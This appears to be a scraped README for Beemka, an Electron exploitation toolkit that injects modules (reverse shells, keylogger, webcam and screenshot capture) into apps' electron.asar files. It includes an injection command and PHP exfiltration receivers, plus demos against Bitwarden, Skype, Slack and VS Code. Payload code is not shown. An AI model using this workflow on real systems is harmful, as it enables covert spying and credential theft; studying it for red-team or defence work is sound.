beemka: Basic Electron Exploitation

BEEMKA – Electron Exploitation Toolkit

Modules

Available modules

[ rshell_cmd ] Windows Reverse Shell
[ rshell_linux ] Linux Reverse Shell
[ screenshot ] Screenshot Module
[ rshell_powershell ] PowerShell Reverse Shell
[ keylogger ] Keylogger Module
[ webcamera ] WebCamera Module

Install

Requirements

• Python 3.5+
• jsmin

Download

git clone https://github.com/ctxis/beemka.git
pip3 install -r requirements.txt

Use

usage: Beemka Electron Exploitation [-h] [-v] [-l] [-i] [-f ASAR_FILE]

                                    [-p ASAR_WORKING_PATH] [-o OUTPUT_FILE]

                                    [-m MODULE] [-u] [-z]



optional arguments:

  -h, --help            show this help message and exit

  -v, --version         show program's version number and exit

  -l, --list-modules    List all available modules.

  -i, --inject          Inject code into Electron.

  -f ASAR_FILE, --asar ASAR_FILE

                        Path to electron.asar file.

  -p ASAR_WORKING_PATH, --asar-working-path ASAR_WORKING_PATH

                        Temporary working path to use for extracting asar

                        archives.

  -o OUTPUT_FILE, --output OUTPUT_FILE

                        Path to the file that will be generated.

  -m MODULE, --module MODULE

                        Module to inject. Use --list-modules to list available

                        modules.

  -u, --unpack          Unpack asar file.

  -z, --pack            Pack asar file.

Injecting a module into an application:

python3 beemka.py –inject –module keylogger –asar “PATH_TO_ELECTRON.ASAR” –output “SAVE_AS_ASAR”

Exfiltration helpers

Under the ./server directory there are the following files:

text.php

This file can be used to receive data sent by the keylogger module.

Before using it, make sure you update the “$storage” parameter at the beginning of the file.

image.php

This file can be used to receive data sent by the webcamera and screenshot modules.

Before using it, make sure you update the “$storage” parameter at the beginning of the file.

Demo

Bitwarden Password Egress

Skype Reverse Shell (Linux)

Slack Desktop Screenshots

VS Code WebCamera

More info, please visit here.

Copyright (c) 2010-2018 Google, Inc. http://angularjs.org

Source: https://github.com/ctxis/